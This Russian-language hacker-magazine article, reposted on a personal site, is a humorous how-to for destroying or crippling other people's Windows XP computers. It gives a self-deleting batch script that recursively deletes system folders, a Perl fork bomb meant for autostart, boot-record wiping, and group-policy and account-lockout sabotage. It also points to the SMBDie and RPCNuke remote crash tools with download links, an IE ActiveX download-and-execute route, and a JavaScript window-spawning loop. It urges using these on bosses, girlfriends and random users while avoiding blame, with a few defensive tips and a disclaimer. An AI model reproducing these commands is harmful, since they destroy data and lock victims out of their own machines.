| Меню сайта |
|
 |
| Категории раздела |
|
|
|
 |
|
 | | RSS
Wwworm
Воскресенье, 19.05.2024, 06:49 |  |
|
 |
Смерть или новая жизнь?
материал взят с сайта www.xakep.ru
Практическое пособие
Microsoft заявляет, что их новый продукт Windows XP стабилен в работе и хорошо защищен от удаленных атак. А хакеры, презрительно хмыкнув, принялись изучать работу сервисов и искать в них ошибки. Ошибки, приводящие к моментальной смерти системы...
Тебе по какой-то причине захотелось отправить операционку ламера в нокаут. Не думай, что для этого потребуются глубокие познания в области взлома. На самом деле все уже придумано до нас. Твоя задача сводится к поиску жертвы и выбору способа смерти операционной системы ;).
Что касается жертвы, то это может быть кто угодно: ламер, который тебя порядком достал вопросами по настройке XP (в этом случае проще убить, чем мучиться), злобный начальник, которому ты хотел бы подкинуть лишней работы по переустановке системы, любимая девушка (догадайся с первого раза, кого она позовет домой для восстановления операционки). А быть может, ты позаришься на первого попавшегося невинного юзера с целью поднять себе настроение :).
Но советую не перегибать палку. За преступлением обычно следует наказание. За решетку тебя никто не посадит, но пару подзатыльников отвалить могут :), поэтому готовься отвечать за свои действия.
В тылу врага
Представь, что ты находишься за компьютером жертвы. Система, радостно виляя хвостом, приветствует нового хозяина, то есть тебя :). Она даже и не подозревает о твоих коварных мыслях. Что ж, приступим к экзекуции! Сперва сделай так, чтобы владелец компа куда-нибудь отошел. Тут действуй в меру своей сообразительности: попроси его заварить чай, предварительно вылив воду из чайника, или сходить в магазин за пивом. Хозяин свалил, и ты остался наедине с его электронным другом. Настало время подумать, как завалить систему. Способов очень много. Действия могут сводиться к тому, чтобы помешать повторно загрузить WinXP, или не оставить от операционки и следа.
Изгнание из MBR
Итак, цель - противостоять загрузке системы. MBR расшифровывается как Master Boot Record (нулевая дорожка на винчестере). Там хранятся сведения о загрузке системы, иными словами, с помощью нулевого сектора операционка имеет возможность загружаться.
Стереть данные из MBR в самой системе невозможно - прямой доступ к диску запрещен во всех версиях NT. Но в WinXP есть замечательный файл boot.ini, который содержит сведения о загрузочном секторе. Если ты удалишь этот файл (он находится в корне диска), XP не сможет загрузиться после ребута. Помни, что по умолчанию системные файлы не отображаются, так что перед удалением придется порыться в свойствах папки.
Мало? Тогда слушай сюда! Прихвати загрузочную дискету от Win98 и бутайся с нее. В командной строке пиши fdisk /mbr и радуйся - загрузочный сектор будет чист как стекло ;). В качестве бонуса можешь поменять активный загрузчик через тот же fdisk, жертва долго будет искать причину сбоя при старте. Единственная проблема - тебе придется объяснить ламеру, почему на его экране обосновался скучный DOS вместо красочных тонов WinXP.
Эти приемы обратимы. Конечно, ламеру проще переустановить дистрибутив заново, чем заниматься реанимацией системы, но умный человек просто загрузится с CD в режиме восстановления и выполнит команды fixboot и fixmbr.
Выстрел в упор
Даже такой тупой прием, как стирание всех файлов в директории, будет работать на ура. Но следует помнить о своей безопасности, поэтому сделай так, чтобы хозяин компа даже не заподозрил тебя в убийстве.
Для этого напиши небольшой bat-файл, который будет совершать всю грязную работу по удалению системных файлов. Назови его shot.bat. В исполняемом скрипте будет вставлена строка "del /S /Q %SYSTEMROOT% %PROFRAMFILES%". Перед этим запрети отображение команд строчкой @echo off. И в завершение удали файл shot.bat с жесткого диска. Да, ключики /S и /Q команды del рекурсивно удаляют заданный каталог без запроса подтверждения.
@echo off
del /S /Q %SYSTEMROOT% %PROFRAMFILES%
del shot.bat
Не думай, что система так просто позволит тебе удалить файлы. Часть из них уже используется, поэтому некоторые останутся на своих местах. Но большинство важных бинарников будут стерты. При этом действительно будет проще переустановить всю систему, чем заниматься рутинным восстановлением. Плюс способа очевиден: если хозяин не поймал тебя с поличным в процессе скриптописания, можешь считать себя отмазанным ;).
Мучительная смерть
Рассмотрим еще один способ, наглядно демонстрирующий "мощность" системы перед злобными процессами :). Он задушит систему по истечении некоторого времени, и лишь reboot сможет вернуть ее к жизни.
Потребуется Perl-интерпретатор. Если отсутствует, собери бинарник с помощью виндового perl2exe. Скрипт очень простой и содержит бесконечный цикл, в каждом шаге которого создается отдельный тред. Потомок производит запуск активного приложения, наподобие MS Word или The Bat. Теперь поразмышляй, сколько времени винда будет работать стабильно. Обычно это время колеблется от десяти секунд до минуты ;). После того как потомки переполнят виндовую таблицу процессов, найти и замочить родительский идентификатор будет очень сложно. Смело прописывай вредоносный скрипт в автозапуск.
#!/usr/bin/perl
while (1) {
unless (fork) {
system("winword.exe")
}
}
Вначале порождается бесконечный цикл. В нем сразу же создается независимый потомок, который наглым образом запускает ворд (приложение можно выбрать по желанию). То, что через десяток секунд от оперативной памяти не останется и мегабайта, проверенный факт ;).
Усиливаем безопасность
В WinXP имеется набор настроек по безопасности. Этого наверняка не знает жертва (иначе ты бы не сидел за чужим компьютером). Убедись, что у хозяина установлен WinXP Professional Edition, затем запускай скрипт gpedit.msc. Этот скрипт используется для настройки групповой политики и имеется по умолчанию в WinXP. Выбирай вкладку рабочего стола у конфигурации пользователей. Зачем юзеру значки на десктопе? Правильно, они там не нужны, отключаем :). Отрубим кнопку завершения сеанса, работы и "выполнить" в следующей вкладке. Заодно задефейсь меню Пуск.
Жертва знает о скрытых настройках системы и вернет все на место? Вернет, если войдет в систему ;). Топай в Панель управления, выбирай раздел администрирование локальной политики и становись на вкладку блокировки аккаунтов. Жмакай по пороговому значению блокировки и выставляй его в 1. Настройка означает, что после неверного ввода пароля учетная запись будет блокирована. Теперь измени время сброса счетчика на 99999 минут. Это время, после которого блокировка снимается (максимальная длина - 5 цифр). И логическим завершением будет смена пароля администратора и текущего пользователя. После проделанных операций можешь попрощаться с другом (подругой) и идти пить пиво, повторно юзер в систему не зайдет.
Плюс этого способа: полная блокировка входа. Даже в режиме восстановления потребуется ввод пароля администратора. Единственный выход - переустановка всей системы. Если имеешь дело с женским полом, можешь вернуть девушке пароль за умеренную натуроплату :).
Удаленные истязания
Допустим, у твоей жертвы есть инет. В этом случае убийство будет выглядеть как простой несчастный случай ;).
Отследить твое сетевое поведение вряд ли удастся. Системные логи не настолько серьезны,
а персональным фаерволом мало кто пользуется.
Сходи на любой портал, посвященный безопасности, и посчитай количество уязвимостей в WinXP за этот год (www.securitylab.ru).
Я уверен, что для этого тебе не хватит пальцев на руках и ногах :), так как последний релиз отличился множеством дырок.
Через эти самые бреши ты и будешь убивать Windows.
Укол через SMB
В конце лета был зарелизен файл, который убивает все версии NT, в том числе и Windows XP.
Ошибка содержится в сервисе Network Share Provider, который работает по умолчанию и сидит на 139 и 445 портах.
Программа формирует неверный блок данных и кормит ими сервер. В результате чего WinXP получает смертельное пищевое
отравление :). SMBDie весит ровно 210 килограммов и выкачивается с родного сайта Хакера (www.xakep.ru/post/16132/smbdie.zip).
Для того чтобы правильно заюзать нюк, необходимо знать IP-адрес и имя компьютера. Если сетевой адрес узнается без проблем,
то с именем могут возникнуть сложности. Определяется при помощи команды nbtstat. Полный синтаксис запроса следующий:
nbtstat -A Ip-address
Утилита выдаст подробное описание компьютера. Так ты найдешь уникальное имя NetBios.
Последнее используй в качестве параметра для SMBDie.
Этот прием универсален. Иными словами, перед ним не устоит никакой дистрибутив, кроме WinXP с первым сервис-паком.
Если ты сам оказался жертвой, советую тебе закрыть фаерволом 139 и 445 порты, либо отключить NetBios вообще.
RPC-эпидемия
Еще одна серьезная уязвимость связана с сервисом RPC. Ее суть - простое переполнение буфера, через которое можно выполнить
произвольный системный код, либо повесить систему. В коде нюка юзается некорректное обращение к
интерфейсу __RemoteGetClassObject. При этом подменяется именованный канал epmapper, а система имперсонируется.
Если подобрать верный адрес возврата, то можно выполнить любую системную команду. В случае перебора получаем
аварийное завершение сервиса и смерть операционки через 60 секунд.
Программу, эксплуатирующую уязвимость, ты можешь скачать по адресу http://hitu.host.sk/dl/RPCNuke.zip.
Запускай ее с параметром IP-адреса машины и радуйся жизни. Вообще, возможно убить систему с помощью обычного RPC-эксплойта,
выбрав ошибочную версию дистрибутива.
RPC-ошибки – больная тема. Дело в том, что после того как MicroSoft патчит одну, хакеры тут же находят другую :).
Радикальным пресечением хакерских проделок является закрытие сервиса фаерволом. Либо ищи все необходимые патчи на сайте MS,
благо их не так много.
IE - отличная мишень!
Какое приложение чаще всего использует юзер? Конечно же, Internet Explorer. В непатченной WinXP это шестая версия браузера.
В ней, как ты уже догадался, было найдено огромное количество багов. Прежде всего, это ошибки при обработке методов ActiveX.
Через подобную брешь становится возможным закачать и выполнить любой файл из инета. Сечешь фишку? С таким раскладом убить
систему не составит большого труда. Нужно лишь заставить жертву посетить ссылку, за которой скрывается вредоносный код.
В коде реализовано скачивание файла (при помощи метода ActiveX) и локальная запись данных в реестр.
После этого свежескачанный файл запускается и локально убивает систему.
Алгоритм подробнейшим образом описан в журнале Хакер за октябрь 2003 года.
Файл, который будет запущен на машине жертвы, надо выбирать с особой тщательностью. Пусть это будет специальная утилита,
заботливо выключающая компьютер, к примеру, TimerXP (ftp://ftp.ware.ru/win/4649OSXTimerXP.exe). Или стандартная tsshutdn.exe,
которую можно запустить из командной строки.
Если ты знаком с JavaScript, то убить систему просто: напиши скрипт, который будет беспорядочно открывать окошки эксплорера,
а как следствие расходовать память операционки. В конечном итоге жертве придется перезагрузить компьютер, чтобы вернуть WinXP
к жизни ;).
Защита от этих приемов предельна проста. Необходимо отключить выполнение кода ActiveX, Java, JavaScript, а также удалить с жесткого
диска Internet Explorer и установить менее дырявый браузер. На самом деле, дыра в обработке ActiveX была пофиксена в
кумулятивном патче для IEv6, который есть на сайте Microsoft.
Смерть от старости
Дефолтовый срок жизни WinXP - 30 дней. Без активации система перестанет бутаться после первого месяца ее использования.
Я встречал людей, которые даже не заботятся о продлении этого срока. Они просто переустанавливают систему каждый месяц.
На мое тактичное замечание о том, что на любом установочном CD имеется папочка Crack с модифенными библиотеками, отвечают,
что боятся бдительных работников Microsoft, которые могут к ним прийти и повязать за незаконные действия.
Если посмотреть с другой стороны, то смерть WinXP может наступить и через десять дней.
В результате истязательных экспериментов со стороны хозяина. Поэтому твоя помощь в умерщвлении системы может оказаться
даже лишней :).
Встретимся на том свете
Все системные администраторы боятся тебя как огня, начальники каждый день переустанавливают свой любимый WinXP,
телефон содрогается от звонков незнакомых девушек, ждущих тебя на чашку крепкого чая... то есть на процесс переустановки системы :).
Изучай почаще багтрак. Дыры в системе находят каждый день, эксплойты и нюки релизят с такой скоростью,
что даже мелкомягкие не успевают выпускать патчи для дистрибутива. Ну чем не рай для виртуального киллера?
Измена или убийство
Жизненный пример. Убив систему, молодой человек избавил себя от лишних проблем. Однажды, от души пофлиртовав в ирке
с малознакомой девчонкой, он ненароком заметил висящий ник своей ревнивой девушки, с которой встречался уже два года.
Герла была на работе и возвращалась домой через час, поэтому действовать нужно было очень быстро. На компьютере девушки был
установлен свежий WinXP. Поиск и скачка нюка SMBDie отняли не так много времени. Ник девахи вылетел из чата с ризоном
Ping Timeout (мирковские логи при этом не сохраняются). Можно было не волноваться за свою подмоченную репутацию ;).
Все ли так плохо?
С одной стороны, мелкомягкие обещают пользователю WinXP абсолютную защиту от хакеров. С другой, убить систему - предельно
простая задача. Но смерть дистрибутива произойдет лишь при дефолтовой настройке системы. Если установить все важные патчи
от MS, накатить первый сервис-пак, грамотно настроить брандмауэр и не подпускать к компу подозрительных личностей ;),
то твой WinXP будет жить и здравствовать несколько лет. До той поры, когда возникнет потребность поставить что-либо новое.
Или до роковой проверки надежности дистрибутива на пьяную голову ;).
От чего умирали наши предки?
Если говорить о способах убийства Win9x (Win95, Win98 и WinME), то на перечисление всевозможных методов не хватит целого журнала.
Число нюков, выпущенных злобными хакерами, невозможно подсчитать. Как ни странно, все они действительно работают и
умертвляют систему за пару мышиных кликов.
Java-эпидемия
JavaScript очень функциональный язык и может убить даже самую стойкую систему. Как? Очень просто! К примеру, открытие нового
окошка браузера в бесконечном цикле введет систему в ступор. А убить ряд самооткрывающихся окон, плодящихся как кролики,
практически невозможно. Вот пример кода, реализующий утечку памяти:
<script>
while(1) {
window.open("www.ya.ru");
}
<script>
Скрипт имеет один побочный эффект - жертве придется лишиться трафика на загрузку веб-страниц. В данном случае нересурсоемкий
сайт Яндекса, но если ты садист, можешь заменить ссылку на порногалерею или флешку размером в пару мегабайт :).
Все способы убийства описаны только для ознакомления. Повторять их не рекомендуется, это уголовно наказуемо.
Стереть загрузочный сектор под WinNT напрямую невозможно. Единственный способ очистки - утилита debug.
Файл boot.ini по умолчанию является системным и недоступен для чтения. Чтобы просмотреть его содержимое,
необходимо включить соответствующую опцию в Свойствах Папки.
Против бреши в IE существует кумулятивный патч. Скачать его ты можешь с сайта Microsoft.
Фантазируй! Удаление системных папок - не единственное, что принесет вред вражеской системе.
Вместо этих каталогов можно уничтожить другие, в том числе и порнокаталог жертвы ;).
Чтобы WinXP не стала лакомым кусочком для хакера, обязательно закрой системные порты фаервола.
В скрипте групповой политики отруби доступ к Панели управления, что вгонит жертву в ступор и заставит переустановить систему :).
Хозяйке на заметку: отменить аварийную перезагрузку можно командой shutdown -a.
|
|
Категория: Не без доли иронии | Добавил: wwworm-12 (15.02.2009) |
| Просмотров: 746
| Рейтинг: 0.0/0 |
Добавлять комментарии могут только зарегистрированные пользователи. [ Регистрация | Вход ] |
|
| Поиск |
|
|
| Друзья сайта |
|
|
|
